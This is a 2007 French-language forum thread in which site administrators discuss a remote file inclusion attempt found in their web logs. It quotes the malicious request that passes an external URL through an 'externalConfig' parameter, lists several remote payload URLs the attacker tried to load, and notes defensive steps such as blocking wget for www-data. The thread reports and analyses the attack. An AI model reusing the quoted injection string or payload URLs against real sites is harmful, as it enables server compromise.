Sujet: Tentative de hack :dawa:
15/03/2007 @ 14:53:48: zion: Tentative de hack :dawa:

Tiens sfun, en jetant un oeil à 2-3 logs, je vois qu'ils essaient de balancer des urls avec des bots... Mouarf... Ils ont pas peur les gars :ddr555:

Les ips clairement des machines vérolées:
dns1.deals4.net
port-135.compila.th.newnet.co.uk
server2.itaw.de

http://www.informaticien.be/index.php?externalConfig=http://www.yenzero.com/wp-admin/c.in??

Marrant à lire la tentative de hack :joce:
http://www.yenzero.com/wp-admin/c.in

Bon déjà DLC je suis en safe mode, mais en plus j'utilise pas le CMS ou le forum kivamal :joce:
Me demande d'ailleurs lequel est visé :figti:
15/03/2007 @ 14:55:31: zion: Tentative de hack :dawa:
http://www.yenzero.com/wp-admin/cmd2.txt

Encore de la lecture :dawaaa:
15/03/2007 @ 15:05:49: didix: Tentative de hack :dawa:
C'marrant, je comprends (plus) rien à ces histoires/logs/tentatives/* :gratgrat:
15/03/2007 @ 15:35:13: ALeXiS: Tentative de hack :dawa:
On dirais qu'il essaye d'exec celui la : http://www.yenzero.com/wp-admin/borek.txt
15/03/2007 @ 15:36:15: max: Tentative de hack :dawa:
C'est wordpress celui qui est visé.


Bizarre les domaines vérolés, ils ne sont pas en .be (pourtant j'ai lu un article qui dit ....)

:smile:


pour plus de sureté chez moi, lynx, wget en zo ne sont pas accessible à www-data.
15/03/2007 @ 15:51:11: zion: Tentative de hack :dawa:
max> J'ai eu une autre tentative y pas longtemps, un .be :itm:
15/03/2007 @ 16:20:07: didix: Tentative de hack :dawa:
[...]

pour plus de sureté chez moi, lynx, wget en zo ne sont pas accessible à www-data.


Comment que ça ce fait-il un truc comme ca ?
Ca se règle ou, comment ?
15/03/2007 @ 19:22:09: ovh: Tentative de hack :dawa:
Marrant à lire la tentative de hack :joce:
http://www.yenzero.com/wp-admin/c.in

NOD32 gueule quand j'essaie de voir cette page, il me la bloque :petrus:
16/03/2007 @ 12:38:39: Ppxl: Tentative de hack :dawa:
Didix > c'est plutot à l'usage des serveurs, ou ces pignoufs imaginent que une page venant de tatawine les bains serait récupérée, intégrée à la page et exécutée ainsi!
Retour